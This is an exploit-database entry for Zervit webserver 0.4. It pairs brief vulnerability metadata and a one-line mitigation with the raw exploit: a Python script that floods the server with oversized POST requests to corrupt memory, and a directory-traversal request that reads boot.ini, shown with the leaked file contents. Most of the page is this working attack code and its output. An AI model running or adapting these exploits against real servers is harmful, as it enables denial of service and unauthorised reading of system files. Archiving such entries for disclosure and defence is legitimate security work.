Zervit webserver 0.4 Directory Traversal & Memory Corruption

vendor:

Zervit webserver

by:

e.wiZz! & shinnai

7,5

CVSS

HIGH

Directory Traversal & Memory Corruption

22, 119

CWE

Product Name: Zervit webserver

Affected Version From: 0.4

Affected Version To: 0.4

Patch Exists: NO

Related CWE: N/A

CPE: a:zervit:zervit_webserver

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2009

Zervit webserver 0.4 Directory Traversal & Memory Corruption

This exploit allows attackers to traverse directories and corrupt memory by sending a POST request with a large buffer.

Mitigation:

Ensure that user input is validated and sanitized before being used in a file or directory path.

Source

Exploit-DB raw data:

#######################  Zervit webserver 0.4 Directory Traversal & Memory Corruption #########


By: e.wiZz! & shinnai

Site: shinnai.net & balcansecurity.com



[Memory Corruption]
########################################################################

import socket

host = "127.0.0.1"
port = 8080

try:
       for i in range(1,10):
              buff = "a" * 3330
              request =  "POST " + buff + " HTTP/1.0"
              connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
              connection.connect((host, port))
              connection.send(request)
except:
       raw_input('\n\nUnable to connect. Press "Enter" to quit...')



[Directory traversal]
#################################################################################

[Request]

GET /../../../../../boot.ini HTTP/1.1
User-Agent: Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1
Host: localhost:80
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Connection: Keep-Alive, TE
TE: deflate, gzip, chunked, identity, trailers
#################################################

[Response]

HTTP/1.1 200 OK
Server: Zervit 0.4
X-Powered-By: Carbono
Connection: close
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 355

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /NOEXECUTE=OPTIN /FASTDETECT
##################################################

# milw0rm.com [2009-05-13]